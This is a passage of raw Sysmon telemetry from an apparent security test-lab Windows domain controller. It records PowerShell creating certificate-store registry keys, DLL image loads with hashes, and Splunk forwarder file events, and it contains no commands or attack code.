12241200x800000000000000057347035Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.730{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057347034Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.730{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347033Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.730{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347032Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.730{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347031Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.730{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347030Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.730{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347029Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.730{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347028Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.730{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347027Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.730{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347026Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.730{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347025Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.730{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347024Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.730{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347023Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.730{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347022Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.729{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347021Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.729{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347020Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.729{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347019Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.729{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347018Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.729{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347017Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.729{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347016Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.729{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\CA\CTLs 12241200x800000000000000057347015Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.729{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\CA\CRLs 12241200x800000000000000057347014Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.729{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\CA\Certificates 12241200x800000000000000057347013Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.729{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\CA 12241200x800000000000000057347012Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.729{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\CA 12241200x800000000000000057347011Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.729{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs 12241200x800000000000000057347010Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.729{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs 12241200x800000000000000057347009Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.729{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates 12241200x800000000000000057347008Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.729{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\CA 12241200x800000000000000057347007Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.729{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs 12241200x800000000000000057347006Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.729{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs 12241200x800000000000000057347005Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.728{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates 12241200x800000000000000057347004Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.728{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\CA 12241200x800000000000000057347003Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.728{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\CA 12241200x800000000000000057347002Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.728{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs 12241200x800000000000000057347001Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.728{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs 12241200x800000000000000057347000Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.728{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates 12241200x800000000000000057346999Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.728{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\CA 12241200x800000000000000057346998Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.728{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs 12241200x800000000000000057346997Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.728{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs 12241200x800000000000000057346996Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.728{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates 12241200x800000000000000057346995Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.728{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\CA 12241200x800000000000000057346994Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.728{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\CA 734700x800000000000000057346993Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:43.725{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\crypt32.dll10.0.14393.4350 (rs1_release.210407-2154)Crypto API32Microsoft® Windows® Operating SystemMicrosoft CorporationCRYPT32.DLLMD5=95BA70CFA8087A209500D7D350BF3A59,SHA256=4265157E8DC2A0E32A6328D54181CC31FD24E3017E60B270623C2CDBE5FAB4FAtrueMicrosoft WindowsValid 734700x800000000000000057346992Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:43.725{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\msasn1.dll10.0.14393.0 (rs1_release.160715-1616)ASN.1 Runtime APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationmsasn1.dllMD5=299464D218A27B56684B715365D149FE,SHA256=2BFE4014E06552A9D4201EF9D1C605694AAF2B7B811265EFD91FC6D1C2D48242trueMicrosoft WindowsValid 734700x800000000000000057346991Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:43.725{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\wintrust.dll10.0.14393.4530 (rs1_release.210705-0736)Microsoft Trust Verification APIsMicrosoft® Windows® Operating SystemMicrosoft CorporationWINTRUST.DLLMD5=992BCD32EF7680C574A426FAA4933ACA,SHA256=5755AC46B4220784A6E6AC12A755CC10892A5AE59B67924576075A1A29D68B3DtrueMicrosoft WindowsValid 734700x800000000000000057346990Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:43.722{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValid 734700x800000000000000057346989Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:43.721{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=D287E1BC5A148E2BCB482DBD0E925738,SHA256=1C2428AD170165DD8DE960C835D9AAB5B268300A676FE935B177ED5D2607430DtrueMicrosoft WindowsValid 734700x800000000000000057346988Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:43.715{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValid 734700x800000000000000057346987Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:43.713{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\windows.storage.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=1D7997E3AFC26B85024D33F835E18056,SHA256=B2376967E156D4971FB66059F6367030AF937943D2EBF80AF856E643B6E95BBFtrueMicrosoft WindowsValid 734700x800000000000000057346986Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:43.656{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704trueMicrosoft WindowsValid 734700x800000000000000057346985Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:43.656{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\shell32.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=837B8644B9CE47EC28152E7D764886E0,SHA256=C5BA64473FB38E6B4592EAFA642AF82715CBC676190985D8D8D4150CE840044FtrueMicrosoft WindowsValid 11241100x800000000000000057346984Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:43.489{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057346983Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:43.488{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A09E99077E23C8D73421067B7EAD926,SHA256=5E374104D2DEB5A3BB219330270AB337317F8E948715B93D5821633D024E474Cfalsetrue 10341000x800000000000000057346982Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:43.462{8B6011A9-886D-6164-0C00-00000000F101}8489544C:\Windows\system32\svchost.exe{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057346981Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:43.460{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A82FB68F785E73141F5ABC91850595A8,SHA256=416DE0DA209CDCBE9B5D1A868CE972F8FE3399FF62E84EFD46D6FD49BDF7B7B2trueMicrosoft WindowsValid 12241200x800000000000000057346980Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.459{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057346979Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.459{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 11241100x800000000000000057346978Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:43.380{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057346977Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:43.380{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB8AE676CB03EED1746B4A07DE3BA347,SHA256=EF35E32CC759C11B00F5D93D2454DD4C24651D8D3E26903D173FC21B4B242574falsetrue 734700x800000000000000057346976Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:43.137{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\eda6c4a8c148f7e83fb160d7019294f2\Microsoft.PowerShell.ConsoleHost.ni.dll10.0.14393.3866Microsoft.PowerShell.ConsoleHostMicrosoft (R) Windows (R) Operating SystemMicrosoft CorporationMicrosoft.PowerShell.ConsoleHost.dllMD5=BFE1CC91C2632CC5FAD1ED362D20C613,SHA256=14A306207F0270D0B0CF96794C97ECACCD2E9CA46CCDE64EA031A1F0CA3A0E9Afalse-Unavailable 12241200x800000000000000057346975Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.343{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057346974Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.343{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x800000000000000057346973Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:43.130{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\625a7ccd665c33cee4988e3cd136b902\System.Core.ni.dll4.8.4395.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Core.dllMD5=27741782AAECFE54A201896D93BA1C9A,SHA256=7389517EE682897300DE398245D2C3EE37E5060CF6320138430A8AA86E6E737Bfalse-Unavailable 12241200x800000000000000057346972Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.236{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057346971Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.236{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x800000000000000057346970Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:43.044{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll4.8.4380.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.dllMD5=C928B5301D291782935A1342A01F6125,SHA256=945ACD65BDCE2291C3C2D15FD910F6E331570D516D386C53FDFB5EC38BE69125false-Unavailable 734700x800000000000000057346969Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:43.139{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000057346968Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:43.139{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057346967Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:43.138{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000057346966Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:43.138{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 12241200x800000000000000057346965Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 